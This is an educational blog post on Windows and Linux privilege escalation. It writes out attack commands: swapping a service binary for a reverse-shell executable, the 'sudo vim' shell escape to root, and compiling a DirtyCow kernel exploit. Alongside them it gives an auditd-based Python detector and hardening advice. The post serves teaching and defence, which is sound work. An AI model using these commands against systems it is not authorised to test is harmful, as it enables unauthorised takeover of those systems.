1. Introduction

A cyberattack rarely happens in one step. When an attacker first gains access to a system, they usually have low-privileged user rights. However, the real goal is to reach root (Linux) or Administrator/SYSTEM (Windows) privileges. This process is called Privilege Escalation.

For the attacker: It means full control over the system.
For the defender: It means preventing escalation paths and detecting attempts.


2. Types of Privilege Escalation

  • Local Privilege Escalation (LPE): Attacker already has access but escalates to higher privileges.
  • Remote Privilege Escalation (RPE): Attacker directly gains high privileges through a remote exploit.
  • Vertical Escalation: Normal user → Administrator/root.
  • Horizontal Escalation: Moving to another user account at the same privilege level.

3. Lab Setup

To safely test these techniques, set up your own lab environment:

  • Linux: Ubuntu/Debian (with weak sudoers config).
  • Windows: Windows 10 / Windows Server (VM for testing).
  • Tools:
    • Linux: linpeas.sh, linenum.sh, pspy
    • Windows: winPEAS.exe, PowerUp.ps1
    • Extra: Metasploit, Sysinternals Suite, auditd

4. Windows Privilege Escalation Techniques

4.1 Misconfigured Services

# Check service details
sc qc VulnerableService

# Check file permissions of the service binary
icacls "C:\Program Files\VulnApp\service.exe"

If the user has Modify permissions, they can replace the binary and restart the service:

sc stop VulnerableService
copy C:\Malware\reverse.exe "C:\Program Files\VulnApp\service.exe"
sc start VulnerableService


4.2 Unquoted Service Path

# Check service path
sc qc UnquotedService

Output:

BINARY_PATH_NAME: C:\Program Files\Vulnerable Service\app.exe

If the path is not quoted, Windows resolves the spaces ambiguously and tries C:\Program.exe before the intended binary, so placing an executable at C:\Program.exe results in execution when the service starts.


4.3 Registry Exploitation

# Check registry permissions
reg query HKLM\System\CurrentControlSet\Services\VulnService


4.4 Scheduled Tasks Manipulation

# List all tasks
schtasks /query /fo LIST /v

If a scheduled task runs as Administrator but the binary or script it executes is writable by all users, it can be exploited.


5. Linux Privilege Escalation Techniques

5.1 SUID Bit Abuse

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

Example:

vim -c ':!sh'


5.2 Weak Sudoers Config

sudo -l

Output:

User hacker may run the following commands:
    (ALL) NOPASSWD: /usr/bin/vim

Exploit:

sudo vim -c ':!sh'


5.3 Kernel Exploits

uname -a

Output:

Linux vulnbox 4.4.0-21-generic

DirtyCow exploit example:

gcc dirtycow.c -o dirtycow -pthread
./dirtycow


5.4 World-Writable Files

find / -writable -type f 2>/dev/null


6. Automated Tools

  • Linux:
./linpeas.sh
./linenum.sh

  • Windows:
winPEAS.exe
Import-Module .\PowerUp.ps1
Invoke-AllChecks


7. Real Case Study

  1. Attacker logs in as a normal user.
  2. Runs sudo -l to check permissions.
  3. Finds weak sudoers config allowing vim.
  4. Executes sudo vim -c ':!sh' → root shell obtained.

8. Detection & Monitoring

Linux – auditd rule:

auditctl -a always,exit -F arch=b64 -S execve
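The rule above records every execve; the value comes from correlating those records into a process tree. As an added example (not part of the original post), the following script parses constructed auditd SYSCALL/EXECVE records for the case study in section 7 and flags a root shell whose parent is not sudo, su, login or sshd. It assumes the rule was loaded with a key named "exec" and does not decode hex-encoded arguments.

```python
import re

# Shells and the programs that are expected to legitimately start a root session.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash", "/usr/bin/dash"}
PRIV_PARENTS = {"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/login", "/usr/sbin/sshd"}
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample records (not real logs, fields trimmed): user auid=1001 runs
# "sudo vim -c ':!sh'"; vim (euid=0) spawns /usr/bin/dash; a plain "ls" is benign.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1700000000.100:101): arch=c000003e syscall=59 success=yes ppid=1100 pid=1200 auid=1001 uid=1001 euid=0 comm="sudo" exe="/usr/bin/sudo" key="exec"
type=EXECVE msg=audit(1700000000.100:101): argc=4 a0="sudo" a1="vim" a2="-c" a3=":!sh"
type=SYSCALL msg=audit(1700000000.200:102): arch=c000003e syscall=59 success=yes ppid=1200 pid=1300 auid=1001 uid=0 euid=0 comm="vim" exe="/usr/bin/vim" key="exec"
type=EXECVE msg=audit(1700000000.200:102): argc=3 a0="vim" a1="-c" a2=":!sh"
type=SYSCALL msg=audit(1700000000.300:103): arch=c000003e syscall=59 success=yes ppid=1300 pid=1310 auid=1001 uid=0 euid=0 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1700000000.300:103): argc=1 a0="sh"
type=SYSCALL msg=audit(1700000000.400:104): arch=c000003e syscall=59 success=yes ppid=1100 pid=1400 auid=1001 uid=1001 euid=1001 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1700000000.400:104): argc=1 a0="ls"
"""

def parse_events(text):
    """Group SYSCALL and EXECVE lines by audit event id -> {id: {field: value, "args": [...]}}."""
    events = {}
    for line in text.splitlines():
        m = re.match(r'type=(\w+) msg=audit\([\d.]+:(\d+)\):', line)
        if not m:
            continue
        rtype, eid = m.group(1), int(m.group(2))
        rec = events.setdefault(eid, {"args": []})
        fields = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if rtype == "SYSCALL":
            rec.update(fields)
        elif rtype == "EXECVE":
            rec["args"] = [fields[f"a{i}"] for i in range(int(fields["argc"]))]
    return events

def find_unexpected_root_shells(text):
    """Return (event id, auid, parent exe, argv) for shells running with euid 0 on behalf
    of a real login user (auid set and not root) whose parent is not a privilege broker."""
    events = parse_events(text)
    exe_by_pid = {int(r["pid"]): r["exe"] for r in events.values() if "pid" in r}
    hits = []
    for eid, r in sorted(events.items()):
        if r.get("exe") not in SHELLS or r.get("euid") != "0":
            continue
        if r.get("auid") in ("0", "4294967295"):  # root login or unset auid: not a sudo path
            continue
        parent = exe_by_pid.get(int(r["ppid"]), "unknown")
        if parent not in PRIV_PARENTS:
            hits.append((eid, r["auid"], parent, " ".join(r["args"])))
    return hits
```

Running it on the sample flags event 103 only: a dash shell with euid 0 for auid 1001, spawned by /usr/bin/vim rather than by sudo itself.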

Windows – Sysmon:
Log changes to services, registry keys, and scheduled tasks with a custom Sysmon config.


9. Prevention & Best Practices

  • Apply the principle of least privilege.
  • Keep kernel and applications up to date.
  • Restrict SUID binaries:
chmod u-s /usr/bin/vim

  • Always quote service paths in Windows.
  • Configure SIEM correlation rules for suspicious escalation activities.

10. Conclusion

Privilege Escalation is a critical step in cyberattacks. For attackers, it opens the door to full system compromise. For defenders, preventing and detecting escalation attempts is essential.

By practicing these examples in a safe lab environment, you can learn how attackers think and strengthen your defenses.
